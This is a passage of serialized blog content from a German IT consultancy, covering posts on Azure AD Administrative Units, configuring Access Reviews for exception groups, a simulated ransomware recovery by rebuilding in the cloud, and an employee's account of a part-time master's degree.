wir die Arbeit mit Cloud-Diensten erleichtern wollen, sollten wir immer ein paar Gedanken in das Thema Betrieb und Architektur investieren. Diese kleine Investition kann mir im Nachhinein eine Menge Arbeit ersparen. Natürlich lassen wir bei diesen Themen niemanden allein und bemühen uns, unser Wissen über Videos und unsere ",[374,5877,5880],{"href":5878,"rel":5879},"https://glueckkanja.gitbook.io/scepman/",[378],"Dokumentation"," weiterzugeben.",{"title":402,"searchDepth":403,"depth":403,"links":5883},[5884,5885,5886,5891,5892],{"id":5706,"depth":403,"text":5707},{"id":5725,"depth":403,"text":5726},{"id":5732,"depth":403,"text":5733,"children":5887},[5888,5889,5890],{"id":5753,"depth":704,"text":5754},{"id":5760,"depth":704,"text":5749},{"id":5766,"depth":704,"text":5767},{"id":5854,"depth":403,"text":5855},{"id":1087,"depth":403,"text":1088},{"categories":5894,"blogtitlepic":5895,"socialimg":5896,"customExcerpt":5689},[2949],"head-scepman-in-action","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-scepman-in-action.jpg","2020-07-31","/posts/2020-07-31-scepman-im-einsatz",{"title":5682,"description":5689},"posts/2020-07-31-scepman-im-einsatz",[3631,420,1522,3631,1773],"a-Z5DjVUP2XQ9ysfz1QW-CNsoq9TYay-DhewgMhNLfw",{"id":5904,"title":5905,"author":31,"body":5906,"cta":3,"description":5912,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":5975,"moment":5979,"navigation":415,"path":5980,"seo":5981,"stem":5982,"tags":5983,"webcast":406,"__hash__":5984},"content_de/posts/2020-08-19-administrative-units.md","Wie leistungsfähig sind die Administrative Units",{"type":350,"value":5907,"toc":5969},[5908,5913,5916,5920,5923,5927,5934,5938,5941,5944,5947,5949],[353,5909,5910],{},[433,5911,5912],{},"Verwaltungseinheiten (Administrative Units) im Azure Active Directory und Organisationseinheiten (Organizational Units) im lokalen Active Directory differieren voneinander. Wir erklären Ihnen, was den Unterschied macht.",[353,5914,5915],{},"Die heutigen technischen Möglichkeiten, administrative Berechtigungen im Azure Active Directory (Azure AD) zu limitieren, sind begrenzt. Das Azure AD hat eine flache Struktur und bietet dadurch keine Organisationseinheiten, wie wir sie aus dem OnPrem Active Directory kennen, um Berechtigungen zu delegieren und Hierarchien zu verwalten. Man könnte annehmen, dass es sich bei den seit Ende 2014 in der Preview befindlichen Administrative Units (AU) im Azure AD um ein ähnliches Konzept handelt wie bei den On-Premises Organizational Units (OU). Das ist aber nicht der Fall.",[2548,5917,5919],{"id":5918},"warum-sollte-man-administrative-units-verwenden","Warum sollte man Administrative Units verwenden?",[353,5921,5922],{},"Ein Administrator hat uneingeschränkten, administrativen Zugang zu allen Benutzern in einem Tenant. Die Berechtigungen können weder regional noch auf einen bestimmten Geltungsbereich beschränkt werden. Spezielle VIP-Benutzergruppen können somit nicht vom Zugriff des normalen Help-Desk-Administrators abgeschottet werden. Microsoft hat daher mit dem Konzept der AUs die Möglichkeit geschaffen, separate Administrationscontainer zu erstellen und damit eine logische Struktur für Ressourcen zu bieten. Sie sollen helfen, den Umfang der administrativen Berechtigungen innerhalb eines Tenants zu reduzieren.",[2548,5924,5926],{"id":5925},"wie-leistungsfähig-sind-die-administrative-units-aktuell","Wie leistungsfähig sind die Administrative Units aktuell?",[353,5928,5929,5930,456],{},"Die AUs befinden sich noch in der Preview und sind derzeit auf Benutzer und Gruppenobjekte limitiert. Ein Benutzer oder eine Gruppe kann Mitglied einer oder mehrerer AUs sein. Es ist keine Hierarchie, Verschachtelung oder Vererbung möglich. Die Zuordnung zu einer AU muss entweder mit PowerShell, Graph oder neu über das Azure Portal zugewiesen werden. Eine dynamische Mitgliedschaft, z.B. basierend auf der zugehörigen Abteilung, ist aktuell nicht möglich. Allerdings lässt sich diese Lücke mit einem Runbook leicht schließen. Durch das Zuweisen einer administrativen Rolle mit Gültigkeitsbereich auf eine AU können Admin-Berechtigungen erteilt werden, die nur für diese AU bestimmt sind. Beispielsweise können Berechtigungen an regionale Administratoren delegiert werden. Ein Helpdesk-Administrator kann somit darauf eingegrenzt werden, Profilinformationen zu aktualisieren, Kennwörter zurückzusetzen und Gruppen für Benutzer nur in der zugewiesenen Administrative Unit zu verwalten. Derzeit sind nicht alle mit Azure AD privilegierten Rollen für die Verwendung mit AUs verfügbar. Eine Übersicht finden Sie ",[374,5931,1491],{"href":5932,"rel":5933},"https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/roles-admin-units-assign-roles#roles-available",[378],[2548,5935,5937],{"id":5936},"was-aber-fehlt-noch-für-eine-sinnvolle-verwendung-der-administrative-units","Was aber fehlt noch für eine sinnvolle Verwendung der Administrative Units?",[353,5939,5940],{},"Eingeschränkte Admin-Rollen für AUs sind in der Gesamtübersicht der Azure Portal Azure AD Rollen nicht sichtbar.",[353,5942,5943],{},"Ich empfehle immer die Verwendung von Privileged Identity Management (PIM), wenn es um administrative Berechtigungen geht. Leider gibt es keine Unterstützung für PIM zusammen mit Administrative Units. Wenn Sie einem Administrator in PIM die Berechtigung für seine Rolle erteilen, ändert sich die Zuweisung des Gültigkeitsbereichs auf einer AU in eine globale Adminrolle für alle Benutzer. Dadurch wird das AU-Konzept nutzlos.",[353,5945,5946],{},"Im Azure Portal für administrative Azure AD Rollen sind die Berechtigungen, die auf AU-Ebene vergeben wurden, nicht sichtbar, sondern sie sind nur in der separaten Übersicht für Administrative Units aufgelistet. Dies kann für Administratoren verwirrend sein.",[2548,5948,1746],{"id":1745},[367,5950,5951,5954,5957,5960,5963,5966],{},[370,5952,5953],{},"Administrative Units können verwendet werden, um Administratorenrechte auf Benutzer und Gruppen auszudehnen.",[370,5955,5956],{},"Eine dynamische Mitgliedschaft ist nicht möglich, stattdessen müssen Automatisierungsskripte genutzt werden.",[370,5958,5959],{},"Eine begrenzte Teilmenge der Azure AD-Rollen sind nur für AU verfügbar.",[370,5961,5962],{},"Azure AD PIM bricht die AU-Beschränkungen, derzeit können nur dauerhafte Rollenzuweisungen verwendet werden. Die Nutzung von PIM und AU für einen Admin schließen sich derzeit aus.",[370,5964,5965],{},"Admins, die AUs verwenden, müssen mit Azure AD P1 lizenziert sein. Mitglieder einer AU benötigen keine spezielle Lizenz.",[370,5967,5968],{},"Administrative Units sind weder hierarchisch strukturiert, noch können sie verschachtelt werden.",{"title":402,"searchDepth":403,"depth":403,"links":5970},[5971,5972,5973,5974],{"id":5918,"depth":403,"text":5919},{"id":5925,"depth":403,"text":5926},{"id":5936,"depth":403,"text":5937},{"id":1745,"depth":403,"text":1746},{"categories":5976,"blogtitlepic":5977,"socialimg":5978,"customExcerpt":5912},[534],"head-administrative-units","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-administrative-units.jpg","2020-08-19","/posts/2020-08-19-administrative-units",{"title":5905,"description":5912},"posts/2020-08-19-administrative-units",[534,1772,420,969],"4l1ehctWT4wEEaVC4oGNSBdMzXIEsbv5NHL2YpZ-V5A",{"id":5986,"title":5987,"author":31,"body":5988,"cta":3,"description":5992,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":6089,"moment":6094,"navigation":415,"path":6095,"seo":6096,"stem":6097,"tags":6098,"webcast":406,"__hash__":6099},"content_de/posts/2020-12-20-access-reviews.md","Access Reviews",{"type":350,"value":5989,"toc":6087},[5990,5993,5998,6001,6015,6018,6024,6027,6033,6036,6042,6045,6051,6054,6059,6062,6068,6071,6074,6079,6082],[353,5991,5992],{},"Eine immer wiederkehrende Aufgabe für IT Administratoren ist der Umgang mit Ausnahmen (Exceptions). Stellen Sie sich folgendes Szenario vor: Sie möchten die Legacy-Authentifizierung mit einer Conditional Access-Regel aus Ihrem Tenant entfernen. Diese Exception muss regelmäßig überprüft werden. Das ist eine zeitraubende Aufgabe, denn die Anzahl der Benutzer in der Gruppe wächst, und jeder Benutzer besteht darauf, dass er die Regel weiterhin benötigt. Kommt Ihnen das bekannt vor?",[353,5994,5995],{},[356,5996],{"alt":5987,"src":5997},"https://res.cloudinary.com/c4a8/image/upload/c_crop,h_1600/c_lpad,w_700/blog/pics/info-access-reviews.png",[353,5999,6000],{},"Dann haben wir einen Vorschlag für Sie: Lassen Sie die Cloud für sich arbeiten! Sie können die Zugriffsüberprüfung (Access Review) im Azure AD Privileged Identity Management nutzen. Nachfolgend eine kurze Anleitung, was Sie hierfür tun müssen:",[5026,6002,6003,6006,6009,6012],{},[370,6004,6005],{},"Erstellen Sie eine Gruppe, um alle Benutzer mit Exceptions zu erfassen.",[370,6007,6008],{},"Legen Sie einen sich wiederholenden Access Review für diese Gruppe an. Benutzer dieser Gruppe überprüfen ihren eigenen Zugriff und entscheiden, ob sie die Exception noch benötigen.",[370,6010,6011],{},"Desweitern können aber auch Gruppenbesitzer und ausgewählte Benutzer oder Gruppen ebenfalls bestätigen, für wen die Ausnahme noch gültig ist.",[370,6013,6014],{},"Sie erhalten ein vollständiges Audit-Protokoll. Ihre Benutzer müssen immer einen Grund für die Verlängerung angeben, und die Gruppe bereinigt sich selbst, wenn Benutzer ihre Exception nicht verlängern.",[353,6016,6017],{},"Hinweis: Wenn Sie Access Reviews noch nie verwendet haben, müssen Sie in Ihrem Tenant die Access Review-Funktion aktiveren.",[353,6019,6020],{},[356,6021],{"alt":6022,"src":6023},"Identity Governance Onboarding","https://res.cloudinary.com/c4a8/image/upload/c_lpad,h_500/b_rgb:008187,c_lpad,h_600,w_1000/blog/pics/img-identity-governance.png",[353,6025,6026],{},"Lassen Sie uns nun Schritt für Schritt einen Access Review für Ihre Ausnahmegruppe einrichten: Navigieren Sie vom Azure-Portal zur Identity Governance Seite. Erstellen Sie im dem Menü \"Getting started\" einen neuen Access Review.",[353,6028,6029],{},[356,6030],{"alt":6031,"src":6032},"Getting Started","https://res.cloudinary.com/c4a8/image/upload/b_rgb:ACD653,c_lpad,h_600,w_1000/blog/pics/img-identity-governance-v02.png",[353,6034,6035],{},"Im Formular \"Create an access review\" geben Sie die Informationen für die Zugriffsüberprüfung inklusive Startdatum an. Das Startdatum kann in der Zukunft liegen. Um die Benutzer innerhalb einer Ausnahmegruppe regelmäßig zu überprüfen, können Sie die Häufigkeit für eine Überprüfung anbgeben, z.B. wöchentlich, monatlich, vierteljährlich oder jährlich. Sie können außerdem eine Dauer festlegen, wie lange eine Überprüfung aktiv sein soll und ob sie nach mehreren Wiederholungen automatisch enden soll. Wenn Sie nur an dem Review von Gastbenutzern interessiert sind, können Sie den Kreis auf \"Guest users only\" einschränken oder aber Sie beziehen alle Benutzer inkl. Gäste mit ein. Da wir in unserem Scenario die Condional Access Regeln überprüfen wollen, sprechen wir in diesem Fall alle in der Gruppe an. Im DropDown \"Users to review\" wählen Sie die Gruppe aus, die Sie prüfen möchten. In der DropDown \"Reviewers\" aktivieren Sie die Option \"Mitglieder (selbst)\" aus, damit die Benutzer ihren eigenen Zugriff überprüfen können.",[353,6037,6038],{},[356,6039],{"alt":6040,"src":6041},"Create Access Review","https://res.cloudinary.com/c4a8/image/upload/b_rgb:FCD116,c_lpad,h_800,w_1000/blog/pics/img-create-access-review.png",[353,6043,6044],{},"Mit einem Programm können Sie alle Governance-Risikomanagement- oder Compliance-Aktivitäten zusammenfassen, die für Ihr Unternehmen relevant sind. Es ist sinnvoll, unterschiedliche Maßnahmen für das Lifecycle-Management zu nutzen, z. B. interne Überprüfungen, rechtliche Vorgaben, die durch GDPR oder SOX erforderlich sind. Dadurch können Auditoren die relevanten Access Reviews anhand der Gruppierung nach Programmen leicht einsehen.",[353,6046,6047],{},[356,6048],{"alt":6049,"src":6050},"Programs","https://res.cloudinary.com/c4a8/image/upload/b_rgb:5CBBFF,c_lpad,h_700,w_1000/blog/pics/img-program.png",[353,6052,6053],{},"Legen Sie die Access Review als Teil Ihres (Standard-)Programms fest. In den Endeinstellungen können Sie festlegen, dass die Entscheidungen der Prüfer automatisch in das Ergebnis einbezogen werden sollen. Sie können auch festlegen, was passieren soll, wenn Reviewer nicht geantwortet haben. Sie können ihnen beispielsweise den Zugriff entziehen oder genehmigen oder aber auch die Systemempfehlungen basierend auf der letzten Anmeldeaktivität eines Benutzers übernehmen. Ist ein Benutzer 30 Tage inaktiv, wird er entfernt. Sie können einige Zusatzinformationen angeben, die in den Einladungs- und Erinnerungs-E-Mails an die zugewiesenen Prüfer angezeigt werden. Danach klicken Sie auf \"Start\", um Ihre Überprüfung zu starten. Sie wird in Ihrer Liste einschließlich des Status angezeigt.",[353,6055,6056],{},[356,6057],{"alt":6049,"src":6058},"https://res.cloudinary.com/c4a8/image/upload/c_lpad,h_500/b_rgb:0072C6,c_lpad,h_600,w_1000/blog/pics/img-review-access.png",[353,6060,6061],{},"Die zugewiesenen Prüfer (in unserem Fall die Mitglieder der Ausnahmegruppe) erhalten eine E-Mail zur Selbstprüfung ihrer Anforderung, ob die Ausnahme beibehalten werden soll. Die Reviewer müssen auf den Link \"Review Access\" klicken und werden dann zum My Access Portal weitergeleitet. Die Prüfer erhalten darüber hinaus Erinnerungen, wenn sie ihre Anfrage nicht geprüft haben.",[353,6063,6064],{},[356,6065],{"alt":6066,"src":6067},"Review Exception","https://res.cloudinary.com/c4a8/image/upload/c_lpad,h_500/b_rgb:FCD116,c_lpad,h_600,w_1000/blog/pics/img-legacy-auth.png",[353,6069,6070],{},"Die Benutzer werden um eine Rückmeldung gebeten. Wenn die Ausnahme beibehalten werden soll, ist die Angabe eines Grundes zwingend erforderlich. Es kann aber auch angegeben werden, dass die Mitgliedschaft in der Ausnahmegruppe aufgehoben werden soll.",[353,6072,6073],{},"Der Administrator kann nachverfolgen, wie die Reviewer hinsichtlich ihrer Gruppenzugehörigkeit entschieden haben, und hat jederzeit Zugriff auf die aktuelle Anzahl der erteilten Ausnahmen.",[353,6075,6076],{},[356,6077],{"alt":402,"src":6078},"https://res.cloudinary.com/c4a8/image/upload/c_lpad,w_900/b_rgb:ACD653,c_lpad,h_600,w_1000/blog/pics/img-dashboard-legacy-auth.png",[353,6080,6081],{},"Die Ergebnisseiten liefern detaillierte Informationen zu den von den Reviewern angegebenen Gründen und zeigen einige Empfehlungen, wie die Mitgliedschaft der Benutzer in der Gruppe zu behandeln ist. Hier sehen Sie beispielsweise, dass sich einige Benutzer innerhalb der letzten 30 Tage überhaupt nicht im Tenant angemeldet haben.",[353,6083,6084],{},[356,6085],{"alt":402,"src":6086},"https://res.cloudinary.com/c4a8/image/upload/b_rgb:5CBBFF,c_lpad,h_400,w_1000/blog/pics/img-review-legacy-auth.png",{"title":402,"searchDepth":403,"depth":403,"links":6088},[],{"categories":6090,"blogtitlepic":6091,"socialimg":6092,"customExcerpt":6093},[534],"head-access-reviews-v02","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-access-reviews-v02.jpg","Mit den Access Reviews im Azure AD lassen sich Gruppenmitgliedschaften, Zugriff auf Unternehmensanwendungen und Rollenzuweisungen effizient verwalten. Der Zugriff von Benutzern kann regelmäßig überprüft werden, um sicherzustellen, dass nur berechtigte Personen Zugriff haben.","2020-12-20","/posts/2020-12-20-access-reviews",{"title":5987,"description":5992},"posts/2020-12-20-access-reviews",[534,1772,420,969],"lHNS5mduScTt3zMcNIEdcmQqrzu63jhlE-Wn48nayjE",{"id":6101,"title":6102,"author":6103,"body":6104,"cta":3,"description":6108,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":6197,"moment":6202,"navigation":415,"path":6203,"seo":6204,"stem":6205,"tags":6206,"webcast":406,"__hash__":6207},"content_de/posts/2021-01-18-ransomware-response.md","Ransomware Response – Was tun, wenn der Ernstfall eintritt?",[24,87],{"type":350,"value":6105,"toc":6194},[6106,6109,6120,6128,6134,6141,6147,6155,6162,6165,6171,6173,6180,6191],[353,6107,6108],{},"Stellen Sie sich vor, Sie kommen morgens ins Büro, starten Ihren PC und nichts geht. Auch Ihre Kollegen sind betroffen. Hektik entsteht, die IT wird hinzugezogen, es herrscht Chaos. Die gesamte IT-Infrastruktur ist verschlüsselt, die Angreifer fordern 1 Bitcoin (ca. 40.000€). Neben der IT- Infrastruktur sind auch große Teile des Backups zerstört bzw. gelöscht.",[353,6110,6111,6112,6115,6116,6119],{},"So in etwa klingen viele reale Szenarien. Um uns selbst auf einen solchen Fall vorzubereiten, haben wir dieses Szenario durchgespielt. Als Grundlage dient uns ein imaginäres Unternehmen, wie wir es oft im Alltag vorfinden. Das Unternehmen nutzt ",[433,6113,6114],{},"vorwiegend on-premises IT-Infrastruktur"," (Active Directory, Exchange, SCCM, …) und konsumiert bereits ",[433,6117,6118],{},"einige Dienste von Microsoft 365",". Das Ziel unseres Use Cases, ist möglichst schnell wieder arbeitsfähig zu werden, dazu zählen Endgeräte und Kommunikationsmittel.",[353,6121,6122,6123,6127],{},"Ohne ein vollständiges Backup und dem Wissen, wie der Angreifer ins Netzwerk gelangt ist und wo er sich manifestiert hat, eine fast unlösbare Aufgabe. Die bisherige on-premises IT-Infrastruktur ohne forensische Prüfung wiederherzustellen, kommt für uns nicht in Frage. In diesem frühen Stadium ist noch nicht klar, wann und wie der Angreifer ins Netzwerk eingedrungen ist. Wie in vielen echten Szenarien können viele kritische Komponenten nicht wiederhergestellt werden, da das Backup zerstört wurde. Wir entwickelten daher die Idee, direkt in die Cloud zu gehen und unseren ",[374,6124,6126],{"href":6125},"/de/technologien/100-percent-cloud","100 % Cloud Blueprint"," vollständig umzusetzen. Mithilfe von Azure Active Directory, Office 365, Intune und RealmJoin wollen wir kurzfristig eine funktionsfähige Arbeitsumgebung bereitstellen. Nach einem solchen Angriff direkt in die Cloud zu gehen, bringt mehrere Vorteile. Viele Dienste können ohne den Aufbau einer Infrastruktur bereitgestellt werden, und dringend benötigte Sicherheitsfunktionen können sofort implementiert werden. Der Neuaufbau verhindert, dass infizierte Systeme mitgeschleppt werden. Mit unserer Strategie möchten wir zeigen, wie schnell wir sind, um Mitarbeiter so zügig wie möglich wieder an die Arbeit zu bringen.",[353,6129,6130],{},[356,6131],{"alt":6132,"src":6133},"Infrastruktur","https://res.cloudinary.com/c4a8/image/upload/c_lpad,h_700,w_1000/blog/pics/chart.png",[353,6135,6136,6137,6140],{},"Unser erster Schritt ist es, den ",[433,6138,6139],{},"bisherigen AD-Sync zu Azure AD zu deaktivieren",". Alle Beteiligten sind sich einig, das bisherige Active Dirctory nicht wiederherzustellen (Stichwort Golden Ticket). Die bereits im Azure AD vorhandenen Identitäten wollen wir aber weiterhin nutzen. Dieser Prozess ist ein wichtiger Eckpfeiler für den Rebuild, kann aber bis zu 72 Stunden dauern. Sobald also die Entscheidung für einen Neuaufbau in der Cloud gefallen ist, muss dieser Schritt als erster erfolgen.",[353,6142,6143],{},[356,6144],{"alt":6145,"src":6146},"Setting up applications","https://res.cloudinary.com/c4a8/image/upload/c_lpad,h_600,w_1000/blog/pics/realmjoin.png",[353,6148,6149,6150,6154],{},"Die Identitäten im Azure AD werden zunächst gesperrt und deren Zugangsdaten zurückgesetzt. Innerhalb kürzester Zeit werden Mailboxen angelegt, die Plattform für ",[374,6151,6153],{"href":6152},"/de/portfolio/future-workplace","unseren Future Workplace"," vorbereitet und alle wichtigen Security Features aktiviert und konfiguriert. Dank unseres bewährten Blueprints sind die ersten Clients nach zwei Tagen provisioniert, in der Cloud enrolled und den Usern bereitgestellt. Hierfür müssen die Protagonisten perfekt Hand in Hand arbeiten, um die zeitlichen Ziele zu erreichen. Nach zwei arbeitsreichen Tagen ist die Basis geschaffen, um alle Mitarbeiter mit einem Endgerät sowie wichtigen Kommunikationsmitteln auszustatten.",[353,6156,6157,6158,6161],{},"Und wie geht es nach den ersten paar Tagen weiter? Ein wichtiger Baustein sind die ",[433,6159,6160],{},"Bestands-E-Mails",". Hierfür muss ein funktionierendes Backup gefunden, wiederhergestellt und geprüft werden. Je nach Situation müssen die Daten so aufbereitet werden, dass sie anschließend in Exchange Online importiert werden können.",[353,6163,6164],{},"Weitere unternehmenskritische Anwendungen sollten ebenfalls in der Cloud neu aufgesetzt werden. Wenn dies nicht möglich ist, ist auch ein on-premises Aufbau denkbar. Hierfür wird in der Regel ein Active Directory benötigt. Da das bisherige Active Directory kompromittiert wurde, muss dieses neu aufgesetzt werden. Die User können aus dem Azure AD exportiert und ins neue Active Directory importiert werden. Anschließend müssen die User per Softmatch über Azure AD Connect mit den Azure AD Usern verknüpft werden. Für das Seamless Single Sign-On der lokalen Applikationen empfehlen wir die Konfiguration von Windows Hello for Business Hybrid. Die benötigten DC-Zertifikate können wir schnell und einfach per SCEPman erstellen und verteilen.",[353,6166,6167],{},[356,6168],{"alt":6169,"src":6170},"Microsoft Defender for Endpoint","https://res.cloudinary.com/c4a8/image/upload/c_lpad,h_600,w_1000/blog/pics/msft-defender-for-endpoint.png",[2548,6172,1088],{"id":1087},[353,6174,6175,6176,6179],{},"Der Befall mit einer Ransomware ist für jedes Unternehmen immer der Worst Case. Allerdings kann aus dem anfänglichen Chaos auch ein Weg geschaffen werden, die IT-Infrastruktur schnell, effektiv und sicher neu aufzubauen. Der ",[433,6177,6178],{},"glueckkanja Blueprint"," zeigt an dieser Stelle, dass unser vielfach erprobter Weg in die Cloud auch in einem solchen Notfallszenario funktionieren kann. In unserer Simulation ist es von unmittelbarem Vorteil, dass das imaginäre Unternehmen bereits seine Identitäten in die Cloud synchronisiert hat. So kann auf gedruckte Mitarbeiterlisten verzichtet werden, was den Prozess deutlich beschleunigt und folglich der Umbau in die Cloud zeitnah durchgeführt werden kann.",[353,6181,6182,6183,6186,6187,6190],{},"Generell bietet der Infrastruktur Neuaufbau in der Cloud viele Vorteile, z.B. können neben der Modernisierung durch neue Funktionen und Technologien auch neue Sicherheitsfeatures implementiert und genutzt werden. Dies beginnt mit dem Einsatz von Conditional Access, um sämtliche Anmeldungen an Microsoft 365 Services zu überwachen und den Zugriff risikobasiert zu gewähren. Darüber hinaus bietet sich auch die Möglichkeit, on-premises installierte Applikationen mit einem Azure AD Application Proxy zu veröffentlichen und die Anmeldungen an dieser Applikation durch Conditional Access zu kontrollieren. Das Management der Clients durch Microsofts Endpoint Manager und die Absicherung der Clients durch den Defender for Endpoint stellt sicher, dass die Clients immer up-to-date und geschützt sind. Dies lässt sich in nahezu Echtzeit automatisch kontrollieren. Microsoft Defender for Office 365 stellt sicher, dass E-Mails jederzeit geprüft und bei Bedarf blockiert werden. Damit deckt Microsoft an dieser Stelle den kompletten Schutzbedarf für Identitäten, Clients und Applikationen ab. Zusätzlich stellt ",[374,6184,494],{"href":1843,"rel":6185},[378]," sicher, dass immer die aktuellsten Pakete auf den Clients installiert sind. Durch den Einsatz von ",[374,6188,3631],{"href":5695,"rel":6189},[378]," vermeidet man den komplexen Neuaufbau einer on-premises PKI, ohne auf notwendige Funktionen bei der Zertifikatsaustellung verzichten zu müssen.",[353,6192,6193],{},"All diese Komponenten sorgen dafür, dass ein solcher, quasi erzwungener Weg in die Cloud schnell und sicher erfolgen kann.",{"title":402,"searchDepth":403,"depth":403,"links":6195},[6196],{"id":1087,"depth":403,"text":1088},{"categories":6198,"blogtitlepic":6199,"socialimg":6200,"customExcerpt":6201},[1117],"head-ransomware","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-ransomware.jpg","Ransomware – ferngesteuerte bösartige Erpressersoftware – ist seit ein paar Jahren eine der größten Bedrohungen für die Cybersicherheit von Unternehmen. Dateien und IT-Systeme werden verschlüsselt, meist bleibt nur ein Erpresserschreiben. Was können Unternehmen tun, wenn das Kind in den Brunnen gefallen ist?","2021-01-18","/posts/2021-01-18-ransomware-response",{"title":6102,"description":6108},"posts/2021-01-18-ransomware-response",[1117,534,2949,3631,494,420],"Cv5Ouuc8xm7ReYv0qBL6gNfjIM0IEQkjAXsacZRZeHE",{"id":6209,"title":6210,"author":10,"body":6211,"cta":3,"description":6215,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":6285,"moment":6290,"navigation":415,"path":6291,"seo":6292,"stem":6293,"tags":6294,"webcast":406,"__hash__":6295},"content_de/posts/2021-02-26-gkgab-studium.md","Berufsbegleitender Master bei glueckkanja",{"type":350,"value":6212,"toc":6276},[6213,6216,6220,6223,6227,6230,6234,6237,6241,6244,6248,6251,6255,6258,6260,6263],[353,6214,6215],{},"Nach knapp 2 Jahren neigt sich mein Masterstudium im Bereich IT-Management, das ich parallel zu meiner Tätigkeit bei glueckkanja absolviert habe, langsam aber sicher dem Ende zu. Es ist also höchste Zeit, meine Erfahrungen hier kurz zusammenzufassen.",[629,6217,6219],{"id":6218},"der-start","Der Start",[353,6221,6222],{},"Nach meinem dualen Bachelor-Abschluss in Wirtschaftsinformatik wollte ich von einem weiteren Studium erst einmal nichts wissen. Nach 7 Semestern Doppelbelastung durch Arbeit und Studium hatte ich genug von Lernphasen und begann einen Vollzeitjob bei glueckkanja. Kaum sechs Monate später hatte ich dann doch das Bedürfnis, einen Master-Abschluss zu machen. Ich sprach mit meinem Vorgesetzten, ob es möglich sei, dass glueckkanja mich bei einem berufsbegleitenden Masterstudiengang unterstützt. Noch am selben Tag waren alle offenen Fragen geklärt. Der Kooperationsvertrag mit der Hochschule Mainz wurde abgeschlossen, meine Bewerbungsunterlagen eingereicht und ich konnte meine Arbeitszeit ab Beginn des Studiums auf 80% reduzieren.",[629,6224,6226],{"id":6225},"ablauf","Ablauf",[353,6228,6229],{},"Das Studium ist so aufgebaut, dass jeden Freitag und Samstag Vorlesungen in der Hochschule in Mainz stattfinden. Wirklich jeden Freitag und Samstag, zwei Jahre lang? Nein, es gab immer wieder Tage, an denen keine Vorlesungen stattfanden. Diese Tage waren das Highlight eines jeden Semesters, da man die Tage unter anderem für persönliche Freizeitaktivitäten nutzen konnte. Für mich persönlich der ideale Ausgleich, den jeder braucht. Anders als bei einem Vollzeitstudium gibt es lediglich im Sommer eine vorlesungsfreie Zeit. Gerade für Freunde des Wintersports ist das sehr ärgerlich. Aber wenn die Vorlesungen und Prüfungen gut liegen, ist eine Woche Ski- oder Snowboardfahren irgendwie machbar.",[629,6231,6233],{"id":6232},"zusammenarbeit-mit-glueckkanja","Zusammenarbeit mit glueckkanja",[353,6235,6236],{},"Bei einem berufsbegleitenden Studium ist die Unterstützung des Unternehmens sehr wichtig. Während meiner Studienzeit wurde viel Rücksicht auf die Vorlesungszeiten genommen und ich erhielt jederzeit kollegiale Unterstützung. Bei Meetings wurde ich von meinen Kollegen vertreten und konnte mich somit freitags immer voll auf mein Studium konzentrieren. Außerdem wurde mir die Möglichkeit gegeben, mein im Studium erworbenes Wissen direkt einzubringen. Meine Anregungen sind nie auf taube Ohren gestoßen.",[629,6238,6240],{"id":6239},"projekte","Projekte",[353,6242,6243],{},"Der größte Benefit des berufsbegleitenden Studiums ist das Zusammenspiel von Wissenschaft und Praxis. Während des Masterstudiums wurden verschiedene Projekte an der Hochschule durchgeführt. Die Themenauswahl lag dabei immer bei uns Studenten. So konnte ich im Rahmen des Studiums unter anderem spannende IoT-Projekte umsetzen. Dank der engen Zusammenarbeit mit meinem Arbeitgeber konnte ich die erarbeiteten Konzepte in meiner Entwicklungsumgebung umsetzen und testen. Auch der Austausch mit meinen Kollegen hat in diesem Bereich viel Spaß gemacht und zu tollen Ergebnissen geführt. Unsere Experten nahmen sich viel Zeit und unterstützten mich mit praxisnahen Tipps. Darüber hinaus wurden verschiedene Events von der Hochschule geplant. So wurden beispielsweise Planspiele im Rahmen des Programms durchgeführt, die einen realistischen und praktischen Einblick in die Unternehmensführung boten.",[629,6245,6247],{"id":6246},"vorteile","Vorteile",[353,6249,6250],{},"Einer der größten Vorteile, neben dem Gehalt, ist das große Netzwerk, das man durch die Kombination von Lehre und Praxis gewinnt. Diese Mischung fördert sowohl die persönliche als auch berufliche Entwicklung. Ein weiterer Pluspunkt ist der Zugang zu wissenschaftlichen Artikeln und Büchern.",[629,6252,6254],{"id":6253},"bedenken","Bedenken",[353,6256,6257],{},"Viele denken, dass man keine freie Minute mehr hat, wenn man ein berufsbegleitendes Studium beginnt. Diese Angst kann ich nehmen. Natürlich sind die Samstage wegen der Vorlesungen nicht mehr frei. Aber die Bundesliga um 15:15 Uhr habe ich in der Regel nie verpasst. Es war auch durchaus möglich, sich mit Freunden und Familien zu treffen oder auch mal abends etwas zu unternehmen. Auch die Hobbys kommen während des Studiums nicht zu kurz. Ein gewisses Maß an Selbstorganisation während des Studiums ist natürlich notwendig, aber eine Motorradtour am Sonntag war mehr als einmal möglich. Natürlich muss man sein Privatleben an bestimmten Tagen und Wochen ein wenig einschränken, aber dafür hat man nach 2 Jahren einen weiteren Abschluss inklusive Berufserfahrung.",[629,6259,1088],{"id":1087},[353,6261,6262],{},"Ein Studium neben der Arbeit ist anstrengend, aber ich würde es immer wieder machen. Die Kombination aus Lehre und Praxis ist einfach einmalig. Durch die großartige Unterstützung und den Rückhalt meines Arbeitsgebers hat es immer Spaß gemacht.",[353,6264,6265,6266,6270,6271,6275],{},"Klingt gut? Wir stellen ein. Klick hier für ",[374,6267,6269],{"href":6268},"/de/unternehmen/jobs/","unsere aktuellen Jobangebote",". Nicht das Passende dabei, dann schick uns gerne deine Initiativbewerbung an ",[374,6272,6274],{"href":6273},"mailto:michael.breither@glueckkanja.com","michael.breither@glueckkanja.com",". Wir freuen uns!",{"title":402,"searchDepth":403,"depth":403,"links":6277},[6278,6279,6280,6281,6282,6283,6284],{"id":6218,"depth":704,"text":6219},{"id":6225,"depth":704,"text":6226},{"id":6232,"depth":704,"text":6233},{"id":6239,"depth":704,"text":6240},{"id":6246,"depth":704,"text":6247},{"id":6253,"depth":704,"text":6254},{"id":1087,"depth":704,"text":1088},{"categories":6286,"blogtitlepic":6287,"socialimg":6288,"customExcerpt":6289},[410],"head-master-alex-rudolph","https://res.cloudinary.com/c4a8/image/upload/social/202102-linkedin-DualesStudium.png","Ist es möglich, neben dem Berufsleben noch zu 